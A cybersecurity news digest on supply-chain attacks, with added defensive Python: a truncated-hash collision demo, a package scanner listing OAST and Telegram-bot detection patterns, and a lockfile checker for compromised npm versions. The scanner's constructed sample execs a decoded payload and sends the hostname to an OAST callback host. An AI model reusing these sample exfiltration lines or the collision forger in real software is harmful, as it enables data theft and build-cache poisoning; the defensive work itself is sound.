CyberSecurity updates
2025-01-31 03:53:13 Pacific

PlushDaemon APT Hits VPN Provider Via Supply Chain - 8d

A newly identified China-aligned APT group, PlushDaemon, has been conducting cyber espionage through a supply chain attack on a South Korean VPN provider. The group replaced the provider's legitimate software installer with a trojanized one that deploys the SlowStepper backdoor, a modular toolkit with components written in C++, Python and Go. PlushDaemon's preferred initial access vector is hijacking the update channels of legitimate software.

Illumina DNA Sequencer Vulnerable BIOS Found - 23d

Researchers have identified critical BIOS/UEFI weaknesses in the Illumina iSeq 100 DNA sequencer. The device ships an outdated BIOS with Compatibility Support Module (CSM, legacy boot) mode enabled, without Secure Boot and without the standard firmware write protections. An attacker who has already gained access to the system can therefore overwrite the firmware, either bricking the device or installing a persistent implant that survives operating system reinstalls. The findings highlight the supply chain risk of building laboratory and medical equipment on commodity hardware with stale firmware, and the need for strict configuration management and firmware integrity checking on devices that handle genomic data. Equipment outside the traditional IT sector is exposed to the same firmware-level attacks as everything else.

China Hacks US Treasury via BeyondTrust - 30d

Chinese state-sponsored threat actors compromised the US Treasury Department through BeyondTrust, a third-party provider of remote support software used by the department. By exploiting a weakness in the vendor's service, the attackers obtained remote access to employee workstations and exfiltrated unclassified documents. The incident illustrates the risk that third-party dependencies and vendor remote access carry for government agencies. Which workstations were affected was not immediately disclosed.

Malicious NPM Packages Target Ethereum Devs - 24d

Malicious npm packages are targeting Ethereum developers by impersonating Hardhat plugins in order to steal private keys and other sensitive configuration data. The packages, whose names mimic legitimate Hardhat plugins, were downloaded more than 1,000 times and could backdoor production systems, with direct financial losses as the consequence. The attackers store the command and control (C2) server address in an Ethereum smart contract and have the packages read it from the chain, which lets them rotate infrastructure without republishing the packages. The campaign is a supply chain attack that relies on developers trusting look-alike package names.

Hackers Weaponize OAST in NPM, PYPI, Ruby - 23d

Malicious packages in the npm, PyPI and RubyGems ecosystems are abusing out-of-band application security testing (OAST) infrastructure, the callback domains that security testers use to confirm blind code execution, as exfiltration and command and control channels. A compromised machine beacons to an attacker-controlled OAST hostname over DNS or HTTP, which blends in with legitimate testing traffic and supports multi-stage follow-on payloads. The packages impersonate legitimate libraries to steal developer secrets.

Malicious PyPI Packages Steal Credentials - 6d

Researchers have identified two malicious packages, zebo and cometlogger, on the Python Package Index (PyPI). Both are designed to steal sensitive information, including login credentials and social media account data, from the systems they run on, and both were downloaded by users while live on the index. The incident is another reminder to vet open-source dependencies and to treat package installation as a supply chain attack surface.

Supply Chain Attack on Open Source Packages - 9d

A supply chain attack compromised open-source npm packages belonging to the rspack and vant projects, injecting cryptomining malware into new releases. The compromised packages have hundreds of thousands of weekly downloads, so the exposure was broad. For rspack the compromised release is version 1.1.7. The event underscores the growing threat of supply chain attacks on open-source projects and the need for stronger publishing controls in open-source ecosystems, as well as better vetting and pinning of dependencies.

Critical OpenWrt Firmware Update Vulnerability - 12d

A critical vulnerability (CVE-2024-54143) in OpenWrt's Attended SysUpgrade (ASU) server allowed attackers to inject malicious firmware images into the update flow. The server keyed its build cache on a SHA-256 hash truncated to 12 hexadecimal characters (48 bits), so an attacker could craft a build request whose key collided with a legitimate user's request, and a command injection flaw in the handling of package names let the attacker run arbitrary commands during the build. Combined, the two flaws allowed a poisoned image to be served to other users asking for the same build. OpenWrt developers patched the server promptly. The case highlights how critical the integrity of the firmware update process is, and how supply chain attacks reach embedded devices.
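
The following is an added example, written for this digest and not taken from OpenWrt's ASU code, that shows why a cache keyed by a truncated hash is dangerous and what the fix looks like. The request shape (version, target, profile, packages) and the field names are assumptions for illustration; the cache class is a toy, and the search uses a 4-hex-character prefix so it finishes in well under a second. The same loop against a 12-character prefix is 2**48 work, which is within reach of GPU hardware, and against the full digest it is 2**256.

```python
"""Truncated cache keys as an attack surface: an added illustration of the
design weakness behind CVE-2024-54143, not OpenWrt's code."""
import hashlib
import json
from typing import Optional

# Constructed sample build request, shaped like an ASU request (assumed field names).
VICTIM_REQUEST = {
    "version": "23.05.5",
    "target": "ath79/generic",
    "profile": "tplink_archer-c7-v2",
    "packages": ["luci"],
}


def canonical(req: dict) -> bytes:
    """Canonical JSON so the same request always hashes to the same key."""
    return json.dumps(req, sort_keys=True, separators=(",", ":")).encode()


def request_key(req: dict, hex_chars: Optional[int] = None) -> str:
    """SHA-256 of the request, optionally truncated to hex_chars (the weak design)."""
    digest = hashlib.sha256(canonical(req)).hexdigest()
    return digest if hex_chars is None else digest[:hex_chars]


def expected_tries(hex_chars: int) -> int:
    """Work to hit a given truncated key: one try in 16**hex_chars succeeds."""
    return 16 ** hex_chars


def forge_colliding_request(victim: dict, hex_chars: int,
                            max_tries: int = 1 << 20) -> Optional[dict]:
    """Second-preimage search against the truncated key.

    The attacker keeps the victim's request shape but appends an extra,
    attacker-chosen package name, varying it until the truncated key matches.
    With 4 hex chars this takes ~65k tries on average; with 12 it is 2**48.
    """
    target = request_key(victim, hex_chars)
    for i in range(max_tries):
        candidate = dict(victim)
        candidate["packages"] = victim["packages"] + [f"evil-pkg-{i}"]
        if request_key(candidate, hex_chars) == target:
            return candidate
    return None


class BuildCache:
    """Toy artefact cache keyed by request_key().

    verify=False reproduces the weak pattern: whoever fills a key first wins.
    verify=True stores the full canonical request next to the artefact and
    refuses to serve an entry whose request differs from the caller's, so a
    truncated-key collision becomes a cache miss (a rebuild) instead of
    serving someone else's image.
    """

    def __init__(self, hex_chars: Optional[int] = None, verify: bool = False):
        self.hex_chars = hex_chars
        self.verify = verify
        self._entries: dict = {}

    def put(self, req: dict, artifact: bytes) -> None:
        self._entries[request_key(req, self.hex_chars)] = (canonical(req), artifact)

    def get(self, req: dict) -> Optional[bytes]:
        entry = self._entries.get(request_key(req, self.hex_chars))
        if entry is None:
            return None
        stored_req, artifact = entry
        if self.verify and stored_req != canonical(req):
            return None  # collision on the truncated key: do not serve
        return artifact


if __name__ == "__main__":
    evil = forge_colliding_request(VICTIM_REQUEST, hex_chars=4)
    assert evil is not None
    print("truncated keys collide:", request_key(evil, 4), request_key(VICTIM_REQUEST, 4))
    print("full keys differ:", request_key(evil) != request_key(VICTIM_REQUEST))
    weak = BuildCache(hex_chars=4)
    weak.put(evil, b"BACKDOORED-IMAGE")          # attacker builds first ...
    print("weak cache serves victim:", weak.get(VICTIM_REQUEST))   # ... victim gets it
    hardened = BuildCache(hex_chars=4, verify=True)
    hardened.put(evil, b"BACKDOORED-IMAGE")
    print("hardened cache serves victim:", hardened.get(VICTIM_REQUEST))  # None
    print("tries for a 12-hex-char key:", expected_tries(12))
```

The point of the verify flag is that truncating the key is not itself fatal if the server never trusts the key alone: comparing the stored request against the caller's request before serving turns a forged collision into a harmless rebuild. Using the full digest as the key closes the search entirely.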

Malicious PyPI Crypto Client Steals Wallet Data - 1d

A malicious PyPI package, 'aiocpa', presented as a legitimate cryptocurrency client, was used to steal cryptocurrency wallet information. Rather than typosquatting an existing project, the attackers published and maintained their own package and introduced the malicious code in a later release, a quieter approach that avoids the obvious look-alike-name signal. The payload was obfuscated with repeated Base64 encoding and zlib compression and exfiltrated the stolen data to a Telegram bot. The case highlights the risk that even a package with a clean history can turn malicious in a routine update.
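
Both the OAST item above and this aiocpa item come down to two signals a reviewer can look for in package source before installing it: a decoder chain feeding exec/eval, and string constants naming out-of-band callback services or a Telegram bot endpoint. The scanner below is an added example written for this digest, not code from any of the reports or projects mentioned. The rules are heuristics of the editor's choosing, the list of OAST hostnames is an assumption to be extended from your own intelligence, and the two sample modules it is run against are constructed here rather than taken from any real package.

```python
"""Static triage for decode-then-execute loaders and out-of-band callback
domains in Python package source. Added example; the rules are the editor's,
not from any of the reports summarised above."""
import ast
import base64
import re
import zlib
from typing import Dict, List, Tuple

# Decoders that routinely wrap staged payloads (matched on the attribute name,
# so both zlib.decompress(...) and __import__('zlib').decompress(...) hit).
DECODERS = {"b64decode", "b85decode", "b32decode", "a85decode", "decompress",
            "unhexlify", "fromhex"}
# Sinks that run what the decoders produce. Bare builtins plus module-qualified
# deserialisers; json.loads is deliberately not a sink.
SINKS = {"exec", "eval", "compile"}
MODULE_SINKS = {("pickle", "loads"), ("marshal", "loads")}

# Callback hostnames offered by public OAST services (assumed list).
OAST_DOMAINS = ("oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online",
                "oast.me", "oastify.com", "interact.sh", "burpcollaborator.net")
TELEGRAM_BOT_API = "api.telegram.org/bot"
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def _parts(call: ast.Call) -> Tuple[str, str]:
    """(base, name): ('json','loads') for json.loads(), ('', 'exec') for exec()."""
    f = call.func
    if isinstance(f, ast.Name):
        return "", f.id
    if isinstance(f, ast.Attribute):
        base = f.value.id if isinstance(f.value, ast.Name) else ""
        return base, f.attr
    return "", ""


def _is_sink(call: ast.Call) -> bool:
    base, name = _parts(call)
    return name in SINKS or (base, name) in MODULE_SINKS


def _has_decoder(node: ast.AST) -> bool:
    """True if any call anywhere under node is one of the DECODERS."""
    return any(isinstance(n, ast.Call) and _parts(n)[1] in DECODERS
               for n in ast.walk(node))


def scan_source(src: str, filename: str = "<module>") -> List[Dict]:
    """Return findings as dicts with rule, line and a short detail string."""
    findings: List[Dict] = []
    tree = ast.parse(src, filename)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _is_sink(node):
            if any(_has_decoder(arg) for arg in node.args):
                findings.append({"rule": "decode-then-exec", "line": node.lineno,
                                 "detail": f"{_parts(node)[1]}() fed by a decoder chain"})
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            low = text.lower()
            for domain in OAST_DOMAINS:
                if domain in low:
                    findings.append({"rule": "oast-callback", "line": node.lineno,
                                     "detail": text})
            if TELEGRAM_BOT_API in low:
                findings.append({"rule": "telegram-bot-exfil", "line": node.lineno,
                                 "detail": text[:40]})
            if LONG_B64.fullmatch(text):
                findings.append({"rule": "long-base64-blob", "line": node.lineno,
                                 "detail": f"{len(text)} chars"})
    return sorted(findings, key=lambda f: (f["line"], f["rule"]))


# --- constructed samples (not real package code) ---------------------------
# A harmless second stage, zlib-compressed and base64-encoded as a loader would carry it.
_BLOB = base64.b64encode(zlib.compress(
    b"".join(f"print('stage {i}')\n".encode() for i in range(200)))).decode()

MALICIOUS_SAMPLE = f'''
import base64, zlib, urllib.request, platform
PAYLOAD = "{_BLOB}"
exec(zlib.decompress(base64.b64decode(PAYLOAD))[::-1])
urllib.request.urlopen("https://example-id.oast.fun/" + platform.node())
urllib.request.urlopen("https://api.telegram.org/bot000:TOKEN/sendMessage?text=hi")
'''

BENIGN_SAMPLE = '''
import base64, json
def load_config(blob):
    return json.loads(base64.b64decode(blob))
'''

if __name__ == "__main__":
    for finding in scan_source(MALICIOUS_SAMPLE, "malicious_sample.py"):
        print(f"{finding['line']:>3}  {finding['rule']:<20} {finding['detail']}")
    print("benign findings:", scan_source(BENIGN_SAMPLE, "benign_sample.py"))
```

Run it over every .py file in a wheel or sdist before the package is allowed into a build, and treat a decode-then-exec hit as a blocker rather than a warning; legitimate libraries almost never need to exec a payload they have just decompressed. The callback-domain rule is only as good as the list you feed it, and a determined actor can build the hostname at runtime, so pair it with egress monitoring for the same domains.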

Malicious Code Found in Solana's Popular web3.js npm Library - 22d

A supply chain attack compromised versions 1.95.6 and 1.95.7 of @solana/web3.js, the npm library most Solana applications use to talk to the blockchain. Code inserted into those releases harvested private keys from applications that loaded them, enabling cryptocurrency theft, and the exposure extended to numerous applications and individual wallets. Developers who installed either version are urged to move to an unaffected release immediately and to treat any private key handled by the compromised code as exposed, rotating it accordingly.
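
Two of the incidents in this digest, the rspack cryptominer release and the @solana/web3.js key stealer, are pinned to exact npm versions, which makes a lockfile check the quickest way to answer "are we affected?". The script below is an added example written for this digest, not tooling from either project. Its watchlist holds only the versions named above and must be extended from the upstream advisories (the vant releases, for instance, are not listed here because this page does not name them); the lockfile it scans is constructed inline. It walks both the lockfileVersion 2/3 "packages" map and the lockfileVersion 1 nested "dependencies" tree, so nested copies pulled in by another dependency are not missed.

```python
"""Check an npm lockfile for package versions named in this page's two npm
incidents. Added example, not tooling from the projects involved."""
import json
from typing import Dict, Iterator, List, Set, Tuple

# Versions named in the summaries above; extend from the upstream advisories.
WATCHLIST: Dict[str, Set[str]] = {
    "@solana/web3.js": {"1.95.6", "1.95.7"},
    "@rspack/core": {"1.1.7"},
    "@rspack/cli": {"1.1.7"},
}


def iter_locked_packages(lock: dict) -> Iterator[Tuple[str, str]]:
    """Yield (name, version) for every resolved package in the lockfile.

    Handles lockfileVersion 2/3, where "packages" is keyed by install path
    ("node_modules/a/node_modules/b"), and lockfileVersion 1, where
    "dependencies" is a nested tree. v2 files carry both, so callers
    de-duplicate.
    """
    for path, meta in lock.get("packages", {}).items():
        if not path:                      # "" is the root project itself
            continue
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if "version" in meta:
            yield name, meta["version"]
    stack = [lock.get("dependencies", {})]
    while stack:
        for name, meta in stack.pop().items():
            if "version" in meta:
                yield name, meta["version"]
            if meta.get("dependencies"):
                stack.append(meta["dependencies"])


def find_compromised(lock: dict, watchlist: Dict[str, Set[str]] = WATCHLIST
                     ) -> List[Tuple[str, str]]:
    """Sorted (name, version) pairs present in the lockfile and on the watchlist."""
    hits = {(n, v) for n, v in iter_locked_packages(lock)
            if v in watchlist.get(n, set())}
    return sorted(hits)


def check_lockfile(path: str, watchlist: Dict[str, Set[str]] = WATCHLIST
                   ) -> List[Tuple[str, str]]:
    """Load package-lock.json from disk and return the watchlist hits."""
    with open(path, encoding="utf-8") as fh:
        return find_compromised(json.load(fh), watchlist)


# Constructed lockfile: a hoisted @solana/web3.js at a bad version, a clean
# @rspack/core, and a nested @rspack/cli pulled in by another dependency.
SAMPLE_LOCK = {
    "name": "wallet-ui",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "wallet-ui", "version": "0.1.0"},
        "node_modules/@solana/web3.js": {"version": "1.95.7"},
        "node_modules/@rspack/core": {"version": "1.1.6"},
        "node_modules/build-helper": {"version": "2.0.0"},
        "node_modules/build-helper/node_modules/@rspack/cli": {"version": "1.1.7"},
    },
}

if __name__ == "__main__":
    for name, version in find_compromised(SAMPLE_LOCK):
        print(f"FLAGGED {name}@{version}")
```

A hit means the bad release is resolved in your tree even if package.json never named it directly, which is exactly the nested case the sample shows. Fixing the lockfile is the first step only; for the web3.js case any key the application handled while that version was installed has to be rotated.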